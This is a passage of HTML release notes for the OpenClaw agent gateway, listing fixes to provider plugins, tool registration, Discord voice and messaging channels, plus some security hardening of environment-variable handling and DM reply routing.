<p>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Agents/tools: skip unavailable media generation and PDF tool factories from the live reply path when Gateway metadata and the active auth store prove no configured provider can back them, while keeping explicit config and auth-backed providers on the normal factory path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: reuse the Gateway metadata startup plan when ensuring reply runtime plugins are loaded, so live agent turns do not broad-load plugin runtimes after the Gateway already scoped startup activation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: delegate scoped reply runtime registry reuse to the plugin loader cache-key compatibility checks, so config changes with the same startup plugin ids cannot keep stale runtime hooks or tools active. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: let compatible wider plugin registries satisfy scoped reply runtime requests when they already contain the requested plugins, avoiding redundant runtime loading without bypassing loader cache-key freshness checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: validate agent model allowlists against manifest model catalog metadata during reply startup, avoiding broad provider runtime catalog loading before the agent run lane starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: keep allowlisted configured model thinking metadata available when manifest catalog rows are absent, so explicit high-reasoning levels remain valid for custom configured models. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: preserve plugin-declared config-only generation providers such as local Comfy workflows during reply tool pre-gating, and share manifest auth/config availability checks between the planner and final tool factories. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep Comfy generation tools visible from legacy local workflow config and cloud API-key config when no Gateway metadata snapshot is active, using plugin-declared manifest signals instead of loading provider runtimes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: route media and generation capability lookups through the Gateway plugin metadata snapshot during reply tool registration, avoiding repeated manifest registry reloads on the live reply path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: let plugins declare media generation auth aliases and base-url guards in manifests, preserving OpenAI Codex OAuth image generation availability without core-owned provider special cases. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: reuse the auth profile store already loaded for the active run when deciding media and generation tool availability, avoiding repeated provider-auth runtime discovery during reply startup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep image, video, and music generation tool registration on manifest/auth control-plane checks instead of loading runtime provider registries during reply startup, reducing live-path tool-prep blocking while leaving provider runtime resolution for execution and list actions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</p>
</li>
<li>
<p>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</p>
</li>
<li>
<p>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</p>
</li>
<li>
<p>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</p>
</li>
<li>
<p>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</p>
</li>
<li>
<p>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</p>
</li>
<li>
<p>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</p>
</li>
<li>
<p>Discord/voice: leave Discord voice off for text-only configs unless <code>channels.discord.voice</code> is explicitly configured, avoiding default <code>GuildVoiceStates</code> traffic and idle gateway CPU pressure for bots that do not use <code>/vc</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>. Thanks @sanchezm86 and @SecureCloudProjO.</p>
</li>
<li>
<p>Discord/voice: rerun configured voice auto-join after Discord gateway RESUMED events and ignore already-destroyed stale voice connections during reconnect cleanup, so health-monitor account restarts can rejoin configured channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>. Thanks @liz709.</p>
</li>
<li>
<p>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: lengthen the default voice join Ready wait, add configurable <code>voice.connectTimeoutMs</code>/<code>voice.reconnectGraceMs</code>, and warn before destroying unrecovered disconnected sessions so slow Discord voice handshakes and reconnects no longer fail silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @darealgege, @kzicherman, and @ayochim.</p>
</li>
<li>
<p>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</p>
</li>
<li>
<p>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</p>
</li>
<li>
<p>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: merge configured media-understanding providers such as Deepgram into partial active provider registries, so follow-up voice turns keep transcribing after another media plugin is already active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>. Thanks @OneMintJulep.</p>
</li>
<li>
<p>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</p>
</li>
<li>
<p>Discord/voice: apply per-channel Discord <code>systemPrompt</code> overrides to voice transcript turns by forwarding the trusted channel prompt through the voice agent run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>. Thanks @qearlyao.</p>
</li>
<li>
<p>Discord/native commands: send component-only interaction replies from slash command and status handlers instead of treating renderable Discord components as an empty response. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Slack/slash commands: send block-only slash command replies instead of dropping Slack block payloads with no plain-text fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Telegram/messages: derive fallback text from interactive button/select labels before sending button-only payloads, so Telegram replies are not rejected as empty messages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>LINE/messages: send quick-reply-only payloads with fallback option text instead of accepting the payload and returning an empty delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</p>
</li>
<li>
<p>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool and asks for spoken reply text, so <code>/vc join</code> sessions synthesize and play agent replies instead of ending with <code>NO_REPLY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>. Thanks @aounakram.</p>
</li>
<li>
<p>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</p>
</li>
<li>
<p>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</p>
</li>
<li>
